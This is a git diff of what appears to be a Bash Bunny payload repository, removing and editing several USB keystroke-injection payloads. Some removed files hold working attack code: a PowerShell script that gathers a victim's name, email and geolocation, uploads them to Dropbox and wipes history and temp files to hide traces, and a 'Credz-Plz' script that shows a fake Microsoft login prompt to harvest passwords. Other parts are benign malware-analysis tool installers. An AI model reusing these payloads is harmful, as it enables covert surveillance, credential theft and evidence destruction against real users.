if grep -qao $1 /tmp/bt_observation; then
|
||||
break
|
||||
else
|
||||
echo "$1 not found"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_PRESENT
|
||||
@@ -1,154 +0,0 @@
|
||||
|
||||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
|
||||
|
||||
.DESCRIPTION
|
||||
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
|
||||
This script will get the Name and email associated with the targets microsoft account
|
||||
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
|
||||
|
||||
# Your dropbox access token to exfiltrate information to
|
||||
|
||||
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-fullName {
|
||||
|
||||
try {
|
||||
|
||||
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
|
||||
|
||||
}
|
||||
|
||||
# If no name is detected function will return $env:UserName
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No name was detected"
|
||||
return $env:UserName
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
return $fullName
|
||||
|
||||
}
|
||||
|
||||
$FN = Get-fullName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-email {
|
||||
|
||||
try {
|
||||
|
||||
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
|
||||
return $email
|
||||
}
|
||||
|
||||
# If no email is detected function will return backup message for sapi speak
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "An email was not found"
|
||||
return "No Email Detected"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
}
|
||||
|
||||
$EM = Get-email
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-GeoLocation{
|
||||
try {
|
||||
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
|
||||
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
|
||||
$GeoWatcher.Start() #Begin resolving current locaton
|
||||
|
||||
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
|
||||
Start-Sleep -Milliseconds 100 #Wait for discovery.
|
||||
}
|
||||
|
||||
if ($GeoWatcher.Permission -eq 'Denied'){
|
||||
Write-Error 'Access Denied for Location Information'
|
||||
} else {
|
||||
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
|
||||
}
|
||||
}
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No coordinates found"
|
||||
return "No Coordinates found"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
$GL = Get-GeoLocation
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
echo $FN >> $env:TMP\$FileName
|
||||
echo $EM >> $env:TMP\$FileName
|
||||
echo $GL >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Upload output file to dropbox
|
||||
|
||||
$TargetFilePath="/$FileName"
|
||||
$SourceFilePath="$env:TMP\$FileName"
|
||||
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||
$authorization = "Bearer " + $DropBoxAccessToken
|
||||
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||
$headers.Add("Authorization", $authorization)
|
||||
$headers.Add("Dropbox-API-Arg", $arg)
|
||||
$headers.Add("Content-Type", 'application/octet-stream')
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
@@ -1,117 +0,0 @@
|
||||

|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# ET Phone Home
|
||||
|
||||
A script I put together to locate your stolen devices, or your "stolen" baited devices
|
||||
|
||||
## Description
|
||||
|
||||
This program is meant to locate your devices. When someone plugs it into their computer
|
||||
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
|
||||
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
|
||||
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox - Your Shared link for the intended file
|
||||
* Windows 7,10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Your device is plugged into the targets computer
|
||||
* A one liner command in the run box will execute the script on the bash bunny
|
||||
Something Like What you see below will be in your loot folder:
|
||||
|
||||
NAME
|
||||
|
||||
EMAIL
|
||||
|
||||
LATITUDE AND LONGITUDE
|
||||
|
||||
```
|
||||
Jakoby
|
||||
|
||||
jakoby@example.com
|
||||
|
||||
Latitude Longitude
|
||||
-------- ---------
|
||||
37.778919 -122.416313
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
Kalani
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
@@ -1,22 +0,0 @@
|
||||
# Title: ET-Phone-Home
|
||||
# Description: this script will download and execute your locator script to find your device when it is plugged in
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Incident_Response
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
|
||||
QUACK ENTER
|
||||
@@ -1,7 +0,0 @@
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED SETUP
|
||||
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
|
||||
LED ATTACK
|
||||
@@ -1,7 +0,0 @@
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
LED SETUP
|
||||
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
|
||||
LED ATTACk
|
||||
@@ -1,36 +0,0 @@
|
||||
# Malware Bunny
|
||||
## Overview
|
||||
This Bash Bunny module is used to install many tools used for reverse engineering and malware analysis.
|
||||
|
||||
|
||||
2 Operation Modes
|
||||
* Web UI for quick access to samples
|
||||
* SSH access for analysis sessions
|
||||
|
||||
|
||||
## Getting Started
|
||||
1. Get Bunny to access the Internet
|
||||
2. Install all tools and components
|
||||
* or - run setup.sh to install everything
|
||||
* or - manually install every tool from setup scripts
|
||||
3. Boot Bunny in Arming mode and upload payload files to switch1 and switch2
|
||||
4. Boot Bunny in switch1 mode to access web interface
|
||||
5. Boot Bunny in switch2 mode to access ssh interface
|
||||
|
||||
Web interface is meant long analysis sessions with minimal use, therefore CUCUMBER is enabled.
|
||||
|
||||
|
||||
## Software Installed
|
||||
1. viper v1.2
|
||||
2. ssdeep v2.14.1
|
||||
3. yara v3.7.0
|
||||
4. pyew
|
||||
6. featherduster
|
||||
7. capstone
|
||||
8. binwalk
|
||||
9. dshell
|
||||
10. wabt
|
||||
11. peepdf
|
||||
12. unzip
|
||||
13. punbup
|
||||
|
||||
@@ -1,45 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: binwalk install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
apt-get install -y python-lzma python-crypto libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord zlib1g-dev liblzma-dev liblzo2-dev liblzo2-dev python-lzo
|
||||
pip install cstruct
|
||||
|
||||
cd /tools/
|
||||
git clone https://github.com/ReFirmLabs/binwalk
|
||||
cd binwalk
|
||||
|
||||
|
||||
git clone https://github.com/devttys0/sasquatch
|
||||
cd sasquatch/
|
||||
ls
|
||||
# edit build file to fix lack of sudo error on make install
|
||||
# vi build.sh
|
||||
./build.sh
|
||||
|
||||
cd ..
|
||||
git clone https://github.com/sviehb/jefferson
|
||||
cd jefferson
|
||||
python setup.py install
|
||||
|
||||
cd ..
|
||||
git clone https://github.com/jrspruitt/ubi_reader
|
||||
cd ubi_reader
|
||||
python setup.py install
|
||||
|
||||
cd ..
|
||||
git clone https://github.com/devttys0/yaffshiv
|
||||
cd yaffshiv
|
||||
python setup.py install
|
||||
|
||||
cd ..
|
||||
wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv
|
||||
cp bin/unstuff /usr/local/bin/
|
||||
|
||||
python setup.py install
|
||||
@@ -1,21 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: capstone install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
cd /tmp/
|
||||
wget https://github.com/aquynh/capstone/archive/3.0.5-rc2.tar.gz
|
||||
tar xf 3.0.5-rc2.tar.gz
|
||||
rm 3.0.5-rc2.tar.gz
|
||||
mv capstone-3.0.5-rc2/ /tools/capstone
|
||||
|
||||
cd /tools/capstone
|
||||
make
|
||||
make install
|
||||
|
||||
cd bindings/python
|
||||
make install
|
||||
@@ -1,29 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: dshell install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
apt-get install -y python-dpkt python-ipy python-pypcap
|
||||
pip install pygeoip
|
||||
|
||||
cd /tools/
|
||||
git clone https://github.com/USArmyResearchLab/Dshell dshell
|
||||
cd dshell
|
||||
|
||||
cd share/GeoIP/
|
||||
wget http://geolite.macxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
|
||||
gunzip -d GeoIP.dat.gz
|
||||
wget http://geolite.maxmind.com/download/geoip/database/GeoIPv6.dat.gz
|
||||
gunzip -d GeoIPv6.dat.gz
|
||||
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum.dat.gz
|
||||
gunzip -d GeoIPASNum.dat.gz
|
||||
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNumv6.dat.gz
|
||||
gunzip -d GeoIPASNumv6.dat.gz
|
||||
cd ../../
|
||||
|
||||
make
|
||||
@@ -1,17 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: featherduster install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
apt-get install -y libgmp3-dev
|
||||
apt-get install -y libncurses-dev
|
||||
|
||||
cd /tools
|
||||
git clone https://github.com/nccgroup/featherduster
|
||||
cd featherduster
|
||||
|
||||
python setup.py install
|
||||
@@ -1,33 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: peepdf install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
apt-get install -y unzip python-libemu
|
||||
|
||||
cd /tmp/
|
||||
wget http://eternal-todo.com/files/pdf/peepdf/peepdf_0.3.zip
|
||||
unzip peepdf_0.3.zip
|
||||
mv peepdf_0.3 /tools/peepdf
|
||||
cd /tools/peepdf
|
||||
|
||||
#mkdir dpt
|
||||
#cd dpt
|
||||
#wget https://storage.googleapis.com/chrome-infra/depot_tools.zip
|
||||
#unzip depot_tools.zip
|
||||
#cd ..
|
||||
#mv dpt /tools/depot_tools
|
||||
#echo 'export PATH=$PATH:$HOME/../tools/depot_tools' >> ~/.bashrc
|
||||
#gclient
|
||||
#mkdir /tools/v8
|
||||
#cd /tools/v8
|
||||
#fetch v8
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,15 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: punbup install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
cd /tools
|
||||
git clone https://github.com/herrcore/punbup
|
||||
cd punbup
|
||||
python setup.py install
|
||||
|
||||
@@ -1,30 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: main install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
# Install System Dependencies
|
||||
apt-get install -y automake libtool make gcc flex bison libmagic-dev libssl-dev python-dev swig libfuzzy-dev exiftool
|
||||
|
||||
# Install Python Dependencies
|
||||
pip install SQLAlchemy PrettyTable python-magic
|
||||
|
||||
# Other Tools
|
||||
apt-get -y install python-scapy pyew unzip
|
||||
|
||||
# Setup Custom Tools
|
||||
./ssdeep.sh
|
||||
./yara.sh
|
||||
./viper.sh
|
||||
./dshell.sh
|
||||
./capstone.sh
|
||||
./binwalk.sh
|
||||
./featherduster.sh
|
||||
./wabt.sh
|
||||
./peepdf.sh
|
||||
|
||||
@@ -1,23 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: ssdeep install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
cd /tmp
|
||||
|
||||
wget https://github.com/ssdeep-project/ssdeep/archive/release-2.14.1.tar.gz
|
||||
tar xf release-2.14.1.tar.gz
|
||||
rm release-2.14.1.tar.gz
|
||||
mv ssdeep-release-2.14.1/ /tools/ssdeep
|
||||
cd /tools/ssdeep
|
||||
|
||||
./bootstrap
|
||||
./configure
|
||||
make
|
||||
make install
|
||||
|
||||
pip install pydeep
|
||||
@@ -1,17 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: viper install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
cd /tmp
|
||||
wget https://github.com/viper-framework/viper/archive/v1.2.tar.gz
|
||||
tar xf v1.2.tar.gz
|
||||
rm v1.2.tar.gz
|
||||
mv viper-1.2/ /tools/viper
|
||||
|
||||
cd /tools/viper
|
||||
pip install -r requirements.txt
|
||||
@@ -1,15 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: web assembly binary toolkit install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
apt-get install cmake clang
|
||||
|
||||
cd /tools/
|
||||
git clone --recursive https://github.com/WebAssembly/wabt
|
||||
cd wabt
|
||||
make
|
||||
@@ -1,23 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: Malware Bunny
|
||||
# Description: yara install script
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
# Firmware: 1.5
|
||||
|
||||
|
||||
cd /tmp
|
||||
wget https://github.com/VirusTotal/yara/archive/v3.7.0.tar.gz
|
||||
tar xf v3.7.0.tar.gz
|
||||
rm v3.7.0.tar.gz
|
||||
mv yara-3.7.0/ /tools/yara
|
||||
|
||||
cd /tools/yara
|
||||
./bootstrap.sh
|
||||
./configure --enable-magic --enable-dotnet
|
||||
make
|
||||
make install
|
||||
|
||||
pip install yara-python
|
||||
@@ -1,24 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: MalwareBunny
|
||||
# Description: Malware Analysis on Bash Bunny
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
#
|
||||
# LED State Descriptions
|
||||
# Magenta Blinking - setup in progress
|
||||
# Blue Blinking - ready to use
|
||||
|
||||
LED M SLOW
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
sleep 3
|
||||
|
||||
cd /tools/viper/
|
||||
python web.py -H 0.0.0.0 -p 8080 &
|
||||
|
||||
CUCUMBER ENABLE
|
||||
sleep 3
|
||||
|
||||
LED B SLOW
|
||||
@@ -1,18 +0,0 @@
|
||||
#!/bin/bash
|
||||
# Title: MalwareBunny
|
||||
# Description: Malware Analysis on Bash Bunny
|
||||
# Author: Zappus
|
||||
# Version: 1.0
|
||||
# Category: Incident-Response
|
||||
# Attackmodes: Ethernet
|
||||
#
|
||||
# LED State Descriptions
|
||||
# Magenta Blinking - setup in progress
|
||||
# Blue Blinking - ready to use
|
||||
|
||||
LED M SLOW
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
sleep 5
|
||||
|
||||
LED B SLOW
|
||||
@@ -1,16 +1,17 @@
|
||||
# Title: Firey TV
|
||||
# Author: DemmSec
|
||||
# Version: 1.0
|
||||
#
|
||||
# Enables ADB and unknown sources on a target FireTV
|
||||
# Then pushes a payload APK via ADB
|
||||
#
|
||||
# Title: Firey TV
|
||||
# Author: DemmSec
|
||||
# Version: 1.0
|
||||
# Description:
|
||||
# Enables ADB and unknown sources on a target FireTV, Then pushes a payload APK via ADB.
|
||||
# Requires android-tools-adb installed on the Bash Bunny
|
||||
#
|
||||
# Purple ............Running HID emulation, enabling ADB and unknown sources
|
||||
# Blue Blinking ...............Running ADB command to push payload.apk
|
||||
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
|
||||
# Green..............Finished
|
||||
# LEDS:
|
||||
# Purple: Running HID emulation, enabling ADB and unknown sources
|
||||
# Blue Blinking: Running ADB command to push payload.apk
|
||||
# Red Blinking: FireTV failed to get an IP address from the Bash Bunny
|
||||
# Green: Finished
|
||||
#
|
||||
# Target: Android (4.4.2)
|
||||
|
||||
LED SETUP
|
||||
GET TARGET_IP
|
||||
@@ -1,13 +1,16 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Android Open Url (unlocked)
|
||||
# Author: bg-wa
|
||||
# Version: 1.0
|
||||
# Target: Android (4.2.2)
|
||||
# Props: Hak5
|
||||
#
|
||||
# Title: Android Open Url (unlocked)
|
||||
# Author: bg-wa
|
||||
# Version: 1.0
|
||||
# Target: Android (4.2.2)
|
||||
# Props: Hak5
|
||||
# Description:
|
||||
# Opens the browser to a specified url on an unlocked android phone.
|
||||
#
|
||||
# LEDS:
|
||||
# Green - Starting
|
||||
# Red - Complete
|
||||
|
||||
LED G
|
||||
|
||||
@@ -1,178 +0,0 @@
|
||||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
|
||||
|
||||
.DESCRIPTION
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your Bash Bunny
|
||||
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Creating loot folder
|
||||
|
||||
# Get Drive Letter
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
|
||||
|
||||
# Test if directory exists if not create directory in loot folder to store file
|
||||
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
|
||||
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
mkdir $TARGETDIR
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to generate the ui.prompt you will use to harvest their credentials
|
||||
#>
|
||||
|
||||
function Get-Creds {
|
||||
do{
|
||||
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
|
||||
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
|
||||
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
|
||||
Get-Creds
|
||||
}
|
||||
$creds = $cred.GetNetworkCredential() | fl
|
||||
return $creds
|
||||
# ...
|
||||
|
||||
$done = $true
|
||||
} until ($done)
|
||||
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to pause the script until a mouse movement is detected
|
||||
#>
|
||||
|
||||
function Pause-Script{
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
|
||||
#>
|
||||
|
||||
function Caps-Off {
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
|
||||
|
||||
#If true, toggle CapsLock key, to ensure that the script doesn't fail
|
||||
if ($caps -eq $true){
|
||||
|
||||
$key = New-Object -ComObject WScript.Shell
|
||||
$key.SendKeys('{CapsLock}')
|
||||
}
|
||||
}
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
|
||||
#>
|
||||
|
||||
Pause-Script
|
||||
|
||||
Caps-Off
|
||||
|
||||
